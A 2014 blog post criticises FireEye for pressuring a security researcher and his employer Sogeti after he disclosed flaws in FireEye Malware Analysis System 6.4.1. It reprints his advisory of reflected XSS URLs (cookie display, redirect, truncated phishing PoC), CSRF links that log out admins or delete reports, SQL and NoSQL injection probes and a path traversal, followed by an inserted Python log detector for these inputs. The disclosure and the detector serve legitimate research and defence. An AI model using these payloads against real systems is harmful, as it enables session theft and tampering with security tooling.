Wednesday, July 9, 2014

A Story of a Bully: FireEye, Sogeti vs kmkz, security researchers

So I really hate it when big companies think they are the boss and can do whatever the hell they want... most of the time they actually get things going the way they wish... but not always.
And recently something interesting happened that caught my eye...

A security researcher, kmkz_security, found multiple vulnerabilities in FireEye Malware Analysis System (MAS) 6.4.1 and, like any other good security researcher, he contacted FireEye in May and later made his full black-box audit public at exploit-db.com.
So you must be thinking... everyone should be happy. FireEye should fix the issues and praise kmkz for the work he did in his free time, right?
Well, not quite. FireEye always posts about vulnerabilities in other companies' software, exploits and their pentesting work. They claim to protect you against undisclosed 0day vulnerabilities and all sorts of cyber threats... bla bla bla... and when you claim that their product has vulnerabilities... well, they were pissed.

 FireEye Malware Analysis System (MAS) 6.4.1 - Multiple Vulnerabilities  
   
 *************************************************************  
 *[Audit Type] web IHM ONLY / Full black-box audit           *
 *[Multiple Vulnerabilities]                                 *    
 *  3 XSS (reflected)                                        *  
 *  1 CSRF                                                   *  
 *  1 NoSQLi (Json object)                                   *  
 *  1 PostGreSQL SQLi (Exploitable?)                         *  
 *  1 File and Path Disclosure                               *  
 *  1 Source code Info-leak                                  *  
 *                                                           *  
 *************************************************************  
    
 [*] XSS:  
   +First XSS (reflected):  
     https://192.168.1.50/yara/show_ya_file?name=<body onload=alert('XSSED')>  
   PoC :  
     Redirection:  
       https://192.168.1.50/yara/show_ya_file?name=<body  
 onload=document.location=(String.fromCharCode(104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109))>  
     Url encoded redirection payload:  
       https://192.168.1.50/yara/show_ya_file?name=%3Cbody%20onload%3Ddocument.location%3D(String.fromCharCode(104%2C116%2C116%2C112%2C58%2C47%2C47%2C103%2C111%2C111%2C103%2C108%2C101%2C46%2C99%2C111%2C109))%3E%0A%09  
    
     Phishing page PoC:  
       https://192.168.1.50/yara/show_ya_file?name=<body  
 onload=document.write(String.fromCharCode  
   +Second XSS (reflected):  
     https://192.168.1.50/network/network?new_domain=%3Cscript%3Ealert%28%27XSSED%27%29%3C%2Fscript%3E  
   +Third XSS (reflected):  
     https://192.168.1.50/manual/csc?mode=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E  
 Show Cookie PoC:  
       https://192.168.1.50/manual/csc?mode=%3C/script%3E%3Ccenter%3E%3Cscript%3Edocument.write%28%22%22%29%3C/script%3E%3Cb%3EUser%20Informations:%3C/b%3E%3Cbr/%3E%3Cscript%3Edocument.write%28document.cookie%29%3C/script%3E%3C/center%3E%3Cpwn  
    
 [*] CSRF:  
    
   PoC:  
     admin logout:  
       https://192.168.1.50/network/network?new_domain=<script>document.location="https://192.168.1.50/login/logout?notice=Deconnection+kmkz+CSRF+PoC"</script>  
     Url encoded admin logout PoC:  
       https://192.168.1.50/network/network?new_domain=%3Cscript%3Edocument.location%3D%22https%3A%2F%2F192.168.1.50%2Flogin%2Flogout%3Fnotice%3DDeconnection%2Bkmkz%2BCSRF%2BPoC%22%3C%2Fscript%3E  
     Report deleting:  
       https://192.168.1.50/network/network?new_domain=<script>document.location="https://192.168.1.50/report/delete_pdf/?id=Alert_Details_fireye-2F_20140502_120000.xml"</script>  
     Url encoded report deleting Poc:  
       https://192.168.1.50/network/network?new_domain=%3Cscript%3Edocument.location%3D%22https%3A%2F%2F192.168.1.50%2Freport%2Fdelete_pdf%2F%3Fid%3DAlert_Details_fireye-2F_20140502_120000.xml%22%3C%2Fscript%3E  
 [*] SQLi PostGreSQL (Exploitable?):  
   https://192.168.1.50/event_stream/send_pcap_file?ev_id=9999 OR SELECT 1,2 FROM events /**  
    
   output:  
     Event ID '9999 OR SELECT 1,2 FROM events ' could not be retrieved.  
     Couldn't find Event with id=9999 OR SELECT 1,2 FROM events  
   https://192.168.1.50/event_stream/send_pcap_file?ev_id=99999999999  
   Output:  
     Event ID '99999999999' could not be retrieved.  
     PG::Error: ERROR: value "99999999999" is out of range for type integer : SELECT "events".* FROM "events" WHERE "events"."id" = $1 LIMIT 1  
    
    
 [*] Files & Directory Disclosure:  
   https://192.168.1.50/malware_analysis/ma_repo : the Input Path field allows Path & file disclosure ../../../../../../../bin/sh (example)  
    
    
 [*] Others:  
   1) NoSQLi (Json)  
     https://192.168.1.50/network/network?new_domain[$ne]=blah  
     Return: {"$ne"=>"blah"} is not a valid host // Exploitable?  
   2) Source code Info-leak:  
     https://192.168.1.50/manual/csc?mode=%3C/script%3E  
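As an added example (not part of kmkz's advisory or this post), a small log-side detector that URL-decodes requests to the MAS web UI and flags the input classes the advisory above exercises: reflected script injection, JavaScript redirects, SQL probing, path traversal and Rack nested-parameter operator smuggling (`new_domain[$ne]`). The sample log lines and the 10.0.0.7 client are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# One coarse heuristic per class of input seen in the advisory above.
RULES = [
    ("xss",         re.compile(r"<\s*(script|body|img|svg|iframe)\b|\bon\w+\s*=", re.I)),
    ("js-redirect", re.compile(r"document\.(location|write|cookie)", re.I)),
    ("sqli",        re.compile(r"\b(or|union)\b\s+select\b|/\*\*|--\s*$", re.I)),
    ("traversal",   re.compile(r"(\.\./){2,}")),
]
REQ_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')  # request target in a combined log line

def classify(url):
    """Return sorted labels for suspicious input in one request URL or target."""
    parts = urlsplit(url)
    labels = set()
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again so a double-encoded payload
        # (encoded by the client, then again by a proxy or logger) is still inspected.
        value = unquote_plus(value)
        # Rack nested-param syntax turns new_domain[$ne]=x into a Hash, which is
        # how the advisory's {"$ne"=>"blah"} reached the host validator.
        if re.search(r"\[\$\w+\]", key):
            labels.add("nosql-operator")
        for label, rx in RULES:
            if rx.search(value):
                labels.add(label)
    return sorted(labels)

def scan_log(lines):
    """Return [(request_target, labels)] for every log line that trips a rule."""
    hits = []
    for line in lines:
        m = REQ_LINE.search(line)
        if m:
            labels = classify(m.group(1))
            if labels:
                hits.append((m.group(1), labels))
    return hits

# Constructed sample log lines modelled on the PoC URLs above (not real traffic).
SAMPLE_LOG = [
    '10.0.0.7 - - [09/Jul/2014:10:00:01 +0000] "GET /network/network?new_domain=mas.example.com HTTP/1.1" 200 812',
    '10.0.0.7 - - [09/Jul/2014:10:00:02 +0000] "GET /yara/show_ya_file?name=%3Cbody%20onload%3Dalert(1)%3E HTTP/1.1" 200 512',
    '10.0.0.7 - - [09/Jul/2014:10:00:03 +0000] "GET /network/network?new_domain[$ne]=blah HTTP/1.1" 200 310',
    '10.0.0.7 - - [09/Jul/2014:10:00:04 +0000] "GET /event_stream/send_pcap_file?ev_id=9999%20OR%20SELECT%201,2%20FROM%20events%20/** HTTP/1.1" 500 290',
]

if __name__ == "__main__":
    for target, labels in scan_log(SAMPLE_LOG):
        print(f"{','.join(labels):<16} {target}")
```

The rules are deliberately coarse: a hit means "look at this request", and the benign first line shows that a plain hostname passes untouched.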


So they next contacted Sogeti, the company kmkz worked for, and also kmkz himself...
They made him take down the disclosure from exploit-db.com. Then FireEye's System Engineering Manager, on July 7, asked Bourbon a.k.a. kmkz to initiate the process of having Google's cache of the disclosure expunged, while confirming that the actual post on Exploit-DB was in fact removed.

And even after all this FireEye was not satisfied...

They requested Sogeti to fire kmkz...
At this point, most of the people who were following this incident had had enough of this nonsense...
And gave some great reactions...


And many others reacted to this, and by now Sogeti started feeling the heat...
They tweeted:

Pretty soon... maybe it's just a coincidence but...
33.46  -3.15 (-8.60%)

FireEye's stock also took a plunge...
And then came the best response...
All I can say is... an honest, hard-working and efficient security researcher will easily get hired by a good company...
FireEye should learn a lesson from this.

